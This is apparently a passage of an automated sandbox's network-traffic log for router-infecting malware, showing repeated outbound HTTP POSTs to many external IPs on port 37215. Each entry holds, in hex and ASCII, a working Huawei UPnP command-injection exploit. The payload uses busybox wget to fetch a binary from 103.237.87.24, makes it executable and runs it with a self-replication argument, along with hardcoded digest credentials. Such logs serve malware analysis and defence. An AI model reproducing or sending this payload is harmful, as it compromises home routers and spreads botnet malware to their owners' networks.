                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  177192.168.2.135147885.15.154.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.068033934 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  178192.168.2.1349026157.27.94.5537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.068059921 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  179192.168.2.1353746197.102.163.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.068073034 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  180192.168.2.135076641.216.124.17737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070059061 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  181192.168.2.1342026197.137.252.3537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070061922 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  182192.168.2.135739841.130.130.9837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070075989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  183192.168.2.134069081.104.28.15037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070092916 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  184192.168.2.1360176157.229.243.14437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070919037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  185192.168.2.135401841.16.110.7437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070919037 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  186192.168.2.1356636197.74.215.6637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:58:54.070956945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 